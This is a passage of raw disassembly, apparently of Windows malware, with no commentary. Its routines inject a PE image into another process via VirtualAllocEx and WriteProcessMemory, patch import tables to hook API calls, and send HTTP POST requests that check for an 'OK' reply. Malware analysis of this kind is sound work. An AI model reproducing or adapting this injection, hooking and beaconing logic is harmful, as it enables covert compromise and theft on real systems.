loc_40636A: ; CODE XREF: sub_4061D1+194�j
cmp [ebp+var_8], ebx
jz short loc_406378
push [ebp+var_10]
call sub_409317
pop ecx
loc_406378: ; CODE XREF: sub_4061D1+12D�j
; sub_4061D1+19C�j
pop edi
loc_406379: ; CODE XREF: sub_4061D1+6C�j
cmp [ebp+var_C], ebx
setnz al
loc_40637F: ; CODE XREF: sub_4061D1+21�j
pop esi
pop ebx
leave
retn
sub_4061D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406383 proc near ; CODE XREF: sub_4063D8+1A0�p
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
mov eax, dword_40FB34
mov [ebp+var_4], 31h
push dword ptr [eax+68h]
lea eax, [ebp+var_38]
push eax
call dword_40FDA0 ; lstrcpyA
push 0
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_38]
push eax
push 0FFFFh
push [ebp+arg_0]
call dword_40FB60
test eax, eax
jz short loc_4063D4
cmp [ebp+var_4], 2
jnz short loc_4063D4
cmp [ebp+var_38], 4Fh
jnz short loc_4063D4
cmp [ebp+var_37], 4Bh
jnz short loc_4063D4
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_4063D4: ; CODE XREF: sub_406383+39�j
; sub_406383+3F�j ...
xor al, al
leave
retn
sub_406383 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063D8 proc near ; CODE XREF: sub_407335+1D4�p
; sub_408BAD+A8�p ...
var_358 = byte ptr -358h
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 358h
push ebx
xor ebx, ebx
push ebx
push ebx
call sub_4034E8
test al, al
pop ecx
pop ecx
jz loc_4065F1
push edi
lea eax, [ebp+var_8]
push eax
push 5
mov [ebp+var_8], ebx
call sub_4035F5
pop ecx
pop ecx
mov edi, eax
call sub_4035AD
cmp edi, ebx
jz loc_4065E5
cmp edi, 0C8h
ja loc_4065E5
push esi
push 3Ch
pop esi
lea eax, [ebp+var_54]
push esi
push eax
call sub_40A94C
pop ecx
pop ecx
lea eax, [ebp+var_158]
mov [ebp+var_44], eax
lea eax, [ebp+var_54]
push eax
push ebx
mov [ebp+var_54], esi
push edi
push [ebp+var_8]
xor esi, esi
inc esi
mov [ebp+var_40], 103h
mov [ebp+var_24], esi
mov [ebp+var_1C], esi
mov [ebp+var_1], bl
call dword_40FB58
test eax, eax
jz loc_4065D6
cmp [ebp+var_40], ebx
jbe loc_4065D6
cmp [ebp+var_48], 3
jz short loc_406480
cmp [ebp+var_48], 4
jnz loc_4065D6
loc_406480: ; CODE XREF: sub_4063D8+9C�j
push ebx
push ebx
push 3
push ebx
push ebx
push [ebp+var_3C]
lea eax, [ebp+var_158]
push eax
push [ebp+arg_0]
call dword_40FB48
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_4065D6
cmp [ebp+var_48], 4
mov [ebp+var_14], 846CF300h
jnz short loc_4064B8
mov [ebp+var_14], 84ECF300h
loc_4064B8: ; CODE XREF: sub_4063D8+D7�j
push 1000h
call sub_4092F9
mov edi, eax
cmp edi, ebx
pop ecx
jz loc_4065CD
cmp [ebp+var_28], ebx
jnz short loc_4064DC
mov [ebp+var_28], offset asc_401340 ; "/"
mov [ebp+var_24], esi
loc_4064DC: ; CODE XREF: sub_4063D8+F8�j
cmp [ebp+var_20], ebx
jnz short loc_4064E4
mov [ebp+var_1C], ebx
loc_4064E4: ; CODE XREF: sub_4063D8+107�j
mov [ebp+var_1], 1
loc_4064E8: ; CODE XREF: sub_4063D8+1E8�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_358]
push eax
push [ebp+arg_C]
call [ebp+arg_4]
test al, al
jz loc_4065C6
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_24]
lea esi, [edi+eax]
add eax, ecx
push eax
push [ebp+var_28]
add esi, ecx
push edi
call sub_409331
add esp, 0Ch
cmp [ebp+var_358], bl
jle short loc_406546
cmp [ebp+var_20], ebx
setz al
dec al
and al, 0E7h
add al, 3Fh
mov [esi], al
lea eax, [ebp+var_358]
push eax
inc esi
push esi
call dword_40FDA0 ; lstrcpyA
jmp short loc_406548
; ---------------------------------------------------------------------------
loc_406546: ; CODE XREF: sub_4063D8+14D�j
mov [esi], bl
loc_406548: ; CODE XREF: sub_4063D8+16C�j
push ebx
push [ebp+var_14]
push ebx
push ebx
push ebx
push edi
push offset aPost ; "POST"
push [ebp+var_C]
call dword_40FB4C
mov esi, eax
cmp esi, ebx
jz short loc_406582
push [ebp+var_18]
push [ebp+var_10]
push ebx
push ebx
push esi
call dword_40FB50
test eax, eax
jz short loc_406582
push esi
call sub_406383
test al, al
pop ecx
jnz short loc_406585
loc_406582: ; CODE XREF: sub_4063D8+18A�j
; sub_4063D8+19D�j
mov [ebp+var_1], bl
loc_406585: ; CODE XREF: sub_4063D8+1A8�j
push [ebp+var_10]
call sub_409317
cmp [ebp+var_1], bl
pop ecx
jz short loc_4065B6
cmp [ebp+arg_8], ebx
jz short loc_4065A2
push esi
push [ebp+arg_C]
call [ebp+arg_8]
mov [ebp+var_1], al
loc_4065A2: ; CODE XREF: sub_4063D8+1BE�j
; sub_4063D8+1DC�j
push ebx
push 1000h
push edi
push esi
call sub_405C0B
add esp, 10h
test eax, eax
jnz short loc_4065A2
loc_4065B6: ; CODE XREF: sub_4063D8+1B9�j
push esi
call dword_40FB40
cmp [ebp+var_1], bl
jnz loc_4064E8
loc_4065C6: ; CODE XREF: sub_4063D8+127�j
push edi
call sub_409317
pop ecx
loc_4065CD: ; CODE XREF: sub_4063D8+EF�j
push [ebp+var_C]
call dword_40FB40
loc_4065D6: ; CODE XREF: sub_4063D8+89�j
; sub_4063D8+92�j ...
push [ebp+var_8]
call sub_409317
mov al, [ebp+var_1]
pop ecx
pop esi
jmp short loc_4065F0
; ---------------------------------------------------------------------------
loc_4065E5: ; CODE XREF: sub_4063D8+37�j
; sub_4063D8+43�j
push [ebp+var_8]
call sub_409317
pop ecx
xor al, al
loc_4065F0: ; CODE XREF: sub_4063D8+20B�j
pop edi
loc_4065F1: ; CODE XREF: sub_4063D8+17�j
pop ebx
leave
retn
sub_4063D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4065F4 proc near ; CODE XREF: sub_406C44+88�p
; sub_406DB8+40�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebx+3Ch]
push edi
push 1
mov edi, 2000h
push edi
add esi, ebx
push dword ptr [esi+50h]
push dword ptr [esi+34h]
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_4], eax
jnz short loc_406641
push 1
push edi
push dword ptr [esi+50h]
push eax
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_4], eax
jnz short loc_406641
loc_40663A: ; CODE XREF: sub_4065F4+5B�j
; sub_4065F4+FD�j ...
xor eax, eax
jmp loc_40679B
; ---------------------------------------------------------------------------
loc_406641: ; CODE XREF: sub_4065F4+2D�j
; sub_4065F4+44�j
push dword ptr [esi+50h]
call sub_4092F9
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz short loc_40663A
push dword ptr [esi+50h]
push ebx
push eax
call sub_409331
mov ecx, [esi+0A0h]
add esp, 0Ch
test ecx, ecx
jz short loc_4066D7
cmp dword ptr [esi+0A4h], 0
jz short loc_4066D7
mov eax, [esi+34h]
mov edi, [ebp+var_4]
sub edi, eax
cmp [ebp+arg_8], 0
jz short loc_406686
sub ebx, eax
mov [ebp+var_10], ebx
jmp short loc_40668A
; ---------------------------------------------------------------------------
loc_406686: ; CODE XREF: sub_4065F4+89�j
and [ebp+var_10], 0
loc_40668A: ; CODE XREF: sub_4065F4+90�j
mov eax, [ebp+var_C]
add ecx, eax
jmp short loc_4066D2
; ---------------------------------------------------------------------------
loc_406691: ; CODE XREF: sub_4065F4+E1�j
mov edx, [ecx+4]
cmp edx, 8
jb short loc_4066CF
add edx, 0FFFFFFF8h
shr edx, 1
push 0
mov [ebp+var_8], edx
pop ebx
jz short loc_4066CF
loc_4066A6: ; CODE XREF: sub_4065F4+D9�j
movzx eax, word ptr [ecx+ebx*2+8]
test ax, ax
jz short loc_4066CA
and eax, 0FFFh
add eax, [ecx]
add eax, [ebp+var_C]
cmp [ebp+arg_8], 0
jz short loc_4066C5
mov edx, [ebp+var_10]
sub [eax], edx
loc_4066C5: ; CODE XREF: sub_4065F4+CA�j
add [eax], edi
mov edx, [ebp+var_8]
loc_4066CA: ; CODE XREF: sub_4065F4+BA�j
inc ebx
cmp ebx, edx
jb short loc_4066A6
loc_4066CF: ; CODE XREF: sub_4065F4+A3�j
; sub_4065F4+B0�j
add ecx, [ecx+4]
loc_4066D2: ; CODE XREF: sub_4065F4+9B�j
cmp dword ptr [ecx], 0
jnz short loc_406691
loc_4066D7: ; CODE XREF: sub_4065F4+72�j
; sub_4065F4+7B�j
mov edi, [esi+54h]
push 4
mov ebx, 1000h
push ebx
push edi
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
jz loc_40663A
push 0
push edi
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE0C ; WriteProcessMemory
lea eax, [ebp+var_8]
push eax
push 2
push edi
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE40 ; VirtualProtectEx
movzx eax, word ptr [esi+14h]
and [ebp+arg_4], 0
cmp word ptr [esi+6], 0
lea eax, [eax+esi+18h]
jbe short loc_40678F
lea edi, [eax+8]
loc_406732: ; CODE XREF: sub_4065F4+199�j
mov eax, [edi+4]
add eax, [ebp+var_4]
push 4
push ebx
push dword ptr [edi]
push eax
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_10], eax
jz loc_40663A
mov ecx, [edi+4]
add ecx, [ebp+var_C]
push 0
push dword ptr [edi]
push ecx
push eax
push [ebp+arg_0]
call dword_40FE0C ; WriteProcessMemory
push 40h
pop eax
lea ecx, [ebp+var_8]
push ecx
push eax
mov [ebp+var_8], eax
push dword ptr [edi]
push [ebp+var_10]
push [ebp+arg_0]
call dword_40FE40 ; VirtualProtectEx
movzx eax, word ptr [esi+6]
add edi, 28h
inc [ebp+arg_4]
cmp [ebp+arg_4], eax
jb short loc_406732
loc_40678F: ; CODE XREF: sub_4065F4+139�j
push [ebp+var_C]
call sub_409317
mov eax, [ebp+var_4]
pop ecx
loc_40679B: ; CODE XREF: sub_4065F4+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_4065F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067A0 proc near ; CODE XREF: sub_4068D5+101�p
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 1Ch
lea eax, [ebp+var_20]
push eax
push esi
push edi
xor ebx, ebx
call dword_40FE38 ; VirtualQueryEx
test eax, eax
jz short loc_40680E
cmp [ebp+var_C], 1
jz short loc_40680E
test word ptr [ebp+var_C], 100h
jnz short loc_40680E
cmp [ebp+var_14], ebx
jz short loc_40680E
lea eax, [ebp+var_4]
push eax
push 40h
push [ebp+arg_C]
push esi
push edi
call dword_40FE40 ; VirtualProtectEx
test eax, eax
jz short loc_40680E
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push edi
call dword_40FE0C ; WriteProcessMemory
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_C]
push esi
push edi
call dword_40FE40 ; VirtualProtectEx
loc_40680E: ; CODE XREF: sub_4067A0+21�j
; sub_4067A0+27�j ...
pop edi
xor eax, eax
test ebx, ebx
pop esi
setnz al
pop ebx
leave
retn
sub_4067A0 endp
; =============== S U B R O U T I N E =======================================
sub_40681A proc near ; CODE XREF: sub_406A70+EE�p
arg_0 = dword ptr 4
push esi
mov esi, eax
test esi, esi
jnz short loc_406862
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_40688C
cmp word ptr [edi], 5A4Dh
jnz short loc_40688C
mov eax, [edi+3Ch]
add eax, edi
cmp dword ptr [eax], 4550h
jnz short loc_40688C
lea esi, [eax+80h]
push 8
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_40688C
cmp [esi+4], eax
jz short loc_40688C
mov esi, [esi]
test esi, esi
jz short loc_40688C
add esi, edi
loc_406862: ; CODE XREF: sub_40681A+5�j
push ebx
push 14h
push esi
xor bl, bl
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_4068BA
loc_406872: ; CODE XREF: sub_40681A+9A�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_4068B6
push 2
add eax, edi
push eax
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz short loc_406890
mov bl, 1
jmp short loc_4068A6
; ---------------------------------------------------------------------------
loc_40688C: ; CODE XREF: sub_40681A+12�j
; sub_40681A+19�j ...
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_406890: ; CODE XREF: sub_40681A+6C�j
mov eax, [esi+0Ch]
push [esp+8+arg_0]
add eax, edi
push eax
xor bl, bl
call dword_40FD8C ; lstrcmpiA
test eax, eax
jz short loc_4068BA
loc_4068A6: ; CODE XREF: sub_40681A+70�j
push 14h
add esi, 14h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz short loc_406872
loc_4068B6: ; CODE XREF: sub_40681A+5D�j
test bl, bl
jnz short loc_4068D0
loc_4068BA: ; CODE XREF: sub_40681A+56�j
; sub_40681A+8A�j
push 14h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_4068D0
cmp [esi+0Ch], eax
jz short loc_4068D0
mov eax, esi
jmp short loc_4068D2
; ---------------------------------------------------------------------------
loc_4068D0: ; CODE XREF: sub_40681A+9E�j
; sub_40681A+AB�j ...
xor eax, eax
loc_4068D2: ; CODE XREF: sub_40681A+B4�j
pop ebx
pop esi
retn
sub_40681A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068D5 proc near ; CODE XREF: sub_406A70+72�p
; sub_406A70+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
cmp [ebp+arg_C], 2
mov eax, [ebp+arg_4]
push edi
jnz short loc_4068EC
mov eax, [eax+10h]
jmp short loc_4068EE
; ---------------------------------------------------------------------------
loc_4068EC: ; CODE XREF: sub_4068D5+10�j
mov eax, [eax]
loc_4068EE: ; CODE XREF: sub_4068D5+15�j
test eax, eax
jz loc_4069E0
mov ecx, [ebp+arg_0]
lea edi, [eax+ecx]
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz loc_4069A4
push ebx
push esi
loc_40690F: ; CODE XREF: sub_4068D5+C7�j
mov eax, [edi]
test eax, eax
jz loc_4069A2
cmp [ebp+arg_C], 2
jnz short loc_406924
cmp eax, [ebp+arg_8]
jmp short loc_40698C
; ---------------------------------------------------------------------------
loc_406924: ; CODE XREF: sub_4068D5+48�j
cmp [ebp+arg_C], 0
jnz short loc_406936
test eax, eax
jns short loc_40698E
movzx eax, ax
cmp [ebp+arg_8], eax
jmp short loc_40698C
; ---------------------------------------------------------------------------
loc_406936: ; CODE XREF: sub_4068D5+53�j
cmp [ebp+arg_C], 1
jnz short loc_40698E
test eax, eax
js short loc_40698E
mov ecx, [ebp+arg_0]
lea esi, [eax+ecx]
lea eax, [ebp+var_4]
push eax
push 40h
push 4
push esi
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
test eax, eax
jz short loc_40698E
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_8]
lea eax, [esi+2]
push eax
call sub_408F6D
add esp, 10h
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push 4
push esi
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
test ebx, ebx
loc_40698C: ; CODE XREF: sub_4068D5+4D�j
; sub_4068D5+5F�j
jz short loc_4069A2
loc_40698E: ; CODE XREF: sub_4068D5+57�j
; sub_4068D5+65�j ...
push 4
add edi, 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz loc_40690F
loc_4069A2: ; CODE XREF: sub_4068D5+3E�j
; sub_4068D5:loc_40698C�j
pop esi
pop ebx
loc_4069A4: ; CODE XREF: sub_4068D5+32�j
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_4069E0
cmp [edi], eax
jz short loc_4069E0
cmp [ebp+arg_C], 2
jnz short loc_4069BF
mov eax, edi
jmp short loc_4069C9
; ---------------------------------------------------------------------------
loc_4069BF: ; CODE XREF: sub_4068D5+E4�j
mov ecx, [ebp+arg_4]
mov eax, [ecx+10h]
sub eax, [ecx]
add eax, edi
loc_4069C9: ; CODE XREF: sub_4068D5+E8�j
push 4
lea ecx, [ebp+arg_10]
push ecx
push eax
push dword_40FB30
call sub_4067A0
add esp, 10h
jmp short loc_4069E2
; ---------------------------------------------------------------------------
loc_4069E0: ; CODE XREF: sub_4068D5+1B�j
; sub_4068D5+DA�j ...
xor al, al
loc_4069E2: ; CODE XREF: sub_4068D5+109�j
pop edi
leave
retn
sub_4068D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069E5 proc near ; CODE XREF: sub_404222+CC�p
; sub_4087B5+7D�p
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
cmp [ebp+arg_4], 0
jbe short locret_406A6E
push esi
mov esi, [ebp+arg_0]
push ebx
add esi, 8
push edi
loc_4069FE: ; CODE XREF: sub_4069E5+84�j
xor edi, edi
cmp [esi], edi
jz short loc_406A6B
push 0FFFFFFFFh
lea eax, [ebp+var_38]
push eax
push dword ptr [esi-8]
call sub_40996F
pop ecx
pop ecx
push eax
call sub_40A747
mov [esi+4], eax
mov eax, [esi]
pop ecx
xor ebx, ebx
cmp [eax+8], edi
pop ecx
jz short loc_406A5D
loc_406A28: ; CODE XREF: sub_4069E5+76�j
mov eax, [esi]
mov eax, [edi+eax+4]
test eax, eax
jz short loc_406A4E
push 0FFFFFFFFh
lea ecx, [ebp+var_38]
push ecx
push eax
call sub_40996F
pop ecx
pop ecx
push eax
call sub_40A747
pop ecx
pop ecx
mov ecx, [esi]
mov [edi+ecx+10h], eax
loc_406A4E: ; CODE XREF: sub_4069E5+4B�j
mov eax, [esi]
inc ebx
mov edi, ebx
imul edi, 14h
cmp dword ptr [edi+eax+8], 0
jnz short loc_406A28
loc_406A5D: ; CODE XREF: sub_4069E5+41�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
add esi, 10h
cmp eax, [ebp+arg_4]
jb short loc_4069FE
loc_406A6B: ; CODE XREF: sub_4069E5+1D�j
pop edi
pop ebx
pop esi
locret_406A6E: ; CODE XREF: sub_4069E5+E�j
leave
retn
sub_4069E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A70 proc near ; CODE XREF: sub_406D52+4E�p
; sub_406E36+45�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
mov [ebp+var_8], ebx
jbe loc_406B82
push esi
mov esi, [ebp+arg_4]
add esi, 0Ch
push edi
loc_406A8C: ; CODE XREF: sub_406A70+10A�j
cmp dword ptr [esi-4], 0
jz loc_406B80
mov eax, [esi]
test eax, eax
jz loc_406B6E
push eax
mov eax, ebx
jmp loc_406B5B
; ---------------------------------------------------------------------------
loc_406AA8: ; CODE XREF: sub_406A70+F8�j
mov eax, [esi-4]
xor edi, edi
cmp [eax+8], edi
mov [ebp+var_4], edi
jz loc_406B56
loc_406AB9: ; CODE XREF: sub_406A70+E0�j
push 4
push ebx
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_406B05
cmp [ebx], eax
jz short loc_406B05
mov eax, [esi-4]
cmp dword ptr [eax+edi+10h], 0
jz short loc_406AEE
add eax, edi
push dword ptr [eax+8]
push 1
push dword ptr [eax+10h]
push ebx
push [ebp+arg_0]
call sub_4068D5
add esp, 14h
test al, al
jnz short loc_406B3F
loc_406AEE: ; CODE XREF: sub_406A70+62�j
mov eax, [esi-4]
cmp word ptr [edi+eax], 0
jz short loc_406B3F
add eax, edi
push dword ptr [eax+8]
movzx eax, word ptr [eax]
push 0
push eax
jmp short loc_406B33
; ---------------------------------------------------------------------------
loc_406B05: ; CODE XREF: sub_406A70+54�j
; sub_406A70+58�j
mov eax, [esi-4]
cmp dword ptr [eax+edi+0Ch], 0
jz short loc_406B3F
lea eax, [ebx+10h]
push 4
push eax
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_406B3F
cmp [ebx+10h], eax
jz short loc_406B3F
mov eax, [esi-4]
add eax, edi
push dword ptr [eax+8]
mov eax, [eax+0Ch]
push 2
push dword ptr [eax]
loc_406B33: ; CODE XREF: sub_406A70+93�j
push ebx
push [ebp+arg_0]
call sub_4068D5
add esp, 14h
loc_406B3F: ; CODE XREF: sub_406A70+7C�j
; sub_406A70+86�j ...
inc [ebp+var_4]
mov edi, [ebp+var_4]
mov eax, [esi-4]
imul edi, 14h
cmp dword ptr [eax+edi+8], 0
jnz loc_406AB9
loc_406B56: ; CODE XREF: sub_406A70+43�j
push dword ptr [esi]
lea eax, [ebx+14h]
loc_406B5B: ; CODE XREF: sub_406A70+33�j
mov edi, [ebp+arg_0]
call sub_40681A
mov ebx, eax
test ebx, ebx
pop ecx
jnz loc_406AA8
loc_406B6E: ; CODE XREF: sub_406A70+2A�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add esi, 10h
cmp eax, [ebp+arg_8]
jb loc_406A8C
loc_406B80: ; CODE XREF: sub_406A70+20�j
pop edi
pop esi
loc_406B82: ; CODE XREF: sub_406A70+E�j
pop ebx
leave
retn
sub_406A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B85 proc near ; CODE XREF: sub_406D03+27�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_C]
cmp dword ptr [edi+8], 0
jz loc_406C27
mov ebx, edi
loc_406B9F: ; CODE XREF: sub_406B85+9C�j
mov eax, [ebx+4]
mov esi, [ebp+arg_0]
cmp esi, [eax]
jnz short loc_406C11
cmp [ebp+arg_10], 0
jz short loc_406BBC
push [ebp+arg_10]
call sub_409E08
cmp eax, esi
pop ecx
jz short loc_406C27
loc_406BBC: ; CODE XREF: sub_406B85+28�j
mov eax, [ebx+8]
xor esi, esi
cmp [eax+8], esi
jz short loc_406C11
xor edi, edi
loc_406BC8: ; CODE XREF: sub_406B85+87�j
cmp [ebp+arg_8], 0
jz short loc_406BDE
movzx ecx, word ptr [edi+eax]
test cx, cx
jz short loc_406BDE
cmp cx, [ebp+arg_8]
jz short loc_406C2E
loc_406BDE: ; CODE XREF: sub_406B85+48�j
; sub_406B85+51�j
cmp [ebp+arg_4], 0
jz short loc_406C00
mov eax, [edi+eax+10h]
test eax, eax
jz short loc_406C00
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_4]
push eax
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_406C2E
loc_406C00: ; CODE XREF: sub_406B85+5D�j
; sub_406B85+65�j
mov eax, [ebx+8]
add edi, 14h
inc esi
cmp dword ptr [edi+eax+8], 0
jnz short loc_406BC8
mov edi, [ebp+arg_C]
loc_406C11: ; CODE XREF: sub_406B85+22�j
; sub_406B85+3F�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
shl eax, 4
lea ebx, [eax+edi]
cmp dword ptr [ebx+8], 0
jnz loc_406B9F
loc_406C27: ; CODE XREF: sub_406B85+12�j
; sub_406B85+35�j
xor eax, eax
loc_406C29: ; CODE XREF: sub_406B85+BD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406C2E: ; CODE XREF: sub_406B85+57�j
; sub_406B85+79�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
shl eax, 4
imul esi, 14h
mov eax, [eax+ecx+8]
mov eax, [eax+esi+8]
jmp short loc_406C29
sub_406B85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C44 proc near ; CODE XREF: sub_404337+27�p
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push edi
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push [ebp+arg_10]
call dword_40FC30
test eax, eax
mov ebx, [ebp+arg_18]
jnz short loc_406CE3
cmp [ebp+var_18], edi
jz short loc_406CE3
cmp [ebp+var_C], edi
mov [ebp+var_4], edi
jz short loc_406CC1
push esi
push edi
push 4
call dword_40FE14 ; CreateToolhelp32Snapshot
mov esi, eax
cmp esi, edi
jz short loc_406CBB
lea eax, [ebp+var_38]
push eax
push esi
mov [ebp+var_38], 1Ch
call dword_40FE28 ; Thread32First
jmp short loc_406CB0
; ---------------------------------------------------------------------------
loc_406C9A: ; CODE XREF: sub_406C44+6E�j
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_C]
jnz short loc_406CA5
inc [ebp+var_4]
loc_406CA5: ; CODE XREF: sub_406C44+5C�j
lea eax, [ebp+var_38]
push eax
push esi
call dword_40FE2C ; Thread32Next
loc_406CB0: ; CODE XREF: sub_406C44+54�j
test eax, eax
jnz short loc_406C9A
push esi
call dword_40FDAC ; CloseHandle
loc_406CBB: ; CODE XREF: sub_406C44+40�j
cmp [ebp+var_4], edi
pop esi
jnz short loc_406CE3
loc_406CC1: ; CODE XREF: sub_406C44+30�j
push 1
push dword_40FCB0
push [ebp+arg_10]
call sub_4065F4
add esp, 0Ch
cmp eax, edi
jz short loc_406CE3
mov ecx, [ebp+arg_0]
add eax, ecx
mov [ebx+0B0h], eax
loc_406CE3: ; CODE XREF: sub_406C44+23�j
; sub_406C44+28�j ...
push [ebp+arg_20]
push [ebp+arg_1C]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FC2C
pop edi
pop ebx
leave
retn
sub_406C44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D03 proc near ; CODE XREF: sub_40436A+33�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_406D1B
mov eax, [esi+4]
test eax, eax
jz short loc_406D1B
cmp word ptr [esi], 0
ja short loc_406D1D
loc_406D1B: ; CODE XREF: sub_406D03+9�j
; sub_406D03+10�j
xor eax, eax
loc_406D1D: ; CODE XREF: sub_406D03+16�j
push [ebp+arg_0]
push [ebp+arg_4]
push [ebp+arg_10]
push eax
push [ebp+arg_8]
call sub_406B85
add esp, 14h
test eax, eax
jz short loc_406D3F
mov ecx, [ebp+arg_14]
mov [ecx], eax
xor eax, eax
jmp short loc_406D4F
; ---------------------------------------------------------------------------
loc_406D3F: ; CODE XREF: sub_406D03+31�j
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
call dword_40FC40
loc_406D4F: ; CODE XREF: sub_406D03+3A�j
pop esi
pop ebp
retn
sub_406D03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
